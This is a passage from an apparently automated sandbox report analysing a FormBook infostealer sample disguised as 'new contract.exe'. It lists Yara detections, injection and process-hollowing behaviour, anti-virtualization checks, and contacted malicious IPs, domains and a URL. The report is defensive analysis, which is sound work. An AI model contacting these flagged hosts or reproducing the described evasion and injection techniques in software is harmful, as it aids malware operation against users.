Source: C:\Users\user\Desktop\new contract.exe Queries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\new contract.exe Queries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\new contract.exe Queries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\new contract.exe Queries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\new contract.exe Queries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\new contract.exe Queries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\new contract.exe Queries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\new contract.exe Queries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\new contract.exe Queries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\new contract.exe Queries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\new contract.exe Queries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\new contract.exe Queries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\new contract.exe Queries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\new contract.exe Queries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\new contract.exe Queries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\new contract.exe Queries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\new contract.exe Queries volume information: C:\Windows\Fonts\DUBAI-BOLD.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\new contract.exe Queries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\new contract.exe Queries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\new contract.exe Queries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\new contract.exe Queries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\new contract.exe Queries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\new contract.exe Queries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\new contract.exe Queries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\new contract.exe Queries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\new contract.exe Queries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\new contract.exe Queries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\new contract.exe Queries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\new contract.exe Queries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\new contract.exe Queries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\new contract.exe Queries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\new contract.exe Queries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\new contract.exe Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\new contract.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_00685FE5 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter, 5_2_00685FE5
Source: C:\Users\user\Desktop\new contract.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior

Stealing of Sensitive Information
barindex
Yara detected FormBook
Source: Yara match File source: 2.2.new contract.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.new contract.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000002.00000002.1806364473.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.4129188271.00000000027A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.4129245511.00000000027D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.4128918968.0000000000510000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1741421854.0000000003F59000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Remote Access Functionality
barindex
Yara detected FormBook
Source: Yara match File source: 2.2.new contract.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.new contract.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000002.00000002.1806364473.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.4129188271.00000000027A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.4129245511.00000000027D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.4128918968.0000000000510000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1741421854.0000000003F59000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_00684B96 fprintf,GetUdpStatisticsEx,GetIpStatisticsEx,SnmpUtilMemAlloc,fprintf,fprintf,SnmpUtilMemFree,fprintf,fprintf,SnmpUtilMemAlloc,SnmpUtilOidCpy,SnmpUtilVarBindFree,SnmpUtilVarBindFree,SnmpUtilVarBindFree,SnmpUtilVarBindFree,GetIcmpStatisticsEx,GetTcpStatisticsEx, 5_2_00684B96
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1531093 Sample: new contract.exe Startdate: 10/10/2024 Architecture: WINDOWS Score: 100 33 www.uickautoquote.net 2->33 35 www.sofaerb.shop 2->35 37 9 other IPs or domains 2->37 41 Suricata IDS alerts for network traffic 2->41 43 Found malware configuration 2->43 45 Malicious sample detected (through community Yara rule) 2->45 47 10 other signatures 2->47 11 new contract.exe 3 2->11         started        signatures3 process4 file5 31 C:\Users\user\...\new contract.exe.log, ASCII 11->31 dropped 59 Injects a PE file into a foreign processes 11->59 15 new contract.exe 11->15         started        signatures6 process7 signatures8 61 Modifies the context of a thread in another process (thread injection) 15->61 63 Maps a DLL or memory area into another process 15->63 65 Sample uses process hollowing technique 15->65 67 2 other signatures 15->67 18 explorer.exe 60 1 15->18 injected process9 dnsIp10 39 www.igmoto.info 89.31.143.90, 49979, 80 QSC-AG-IPXDE Germany 18->39 49 Uses netstat to query active network connections and open ports 18->49 22 NETSTAT.EXE 18->22         started        25 autofmt.exe 18->25         started        signatures11 process12 signatures13 51 Modifies the context of a thread in another process (thread injection) 22->51 53 Maps a DLL or memory area into another process 22->53 55 Tries to detect virtualization through RDTSC time measurements 22->55 57 Switches to a custom stack to bypass stack traces 22->57 27 cmd.exe 1 22->27         started        process14 process15 29 conhost.exe 27->29         started       
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
89.31.143.90
 www.igmoto.info Germany
15598 QSC-AG-IPXDE true

Contacted Domains

Name IP Active
www.igmoto.info 89.31.143.90 true
www.livialiving.online unknown unknown
www.arklife.shop unknown unknown
www.uickautoquote.net unknown unknown
www.sofaerb.shop unknown unknown
www.ldkp.net unknown unknown
www.innivip.bio unknown unknown
www.r64mh1.vip unknown unknown
www.olar-systems-panels-61747.bond unknown unknown
www.aycare-service-99683.bond unknown unknown
www.aser-cap-hair-growth.today unknown unknown

Contacted URLs

Name Malicious Antivirus Detection Reputation
www.aycare-service-99683.bond/c89p/ true
    		unknown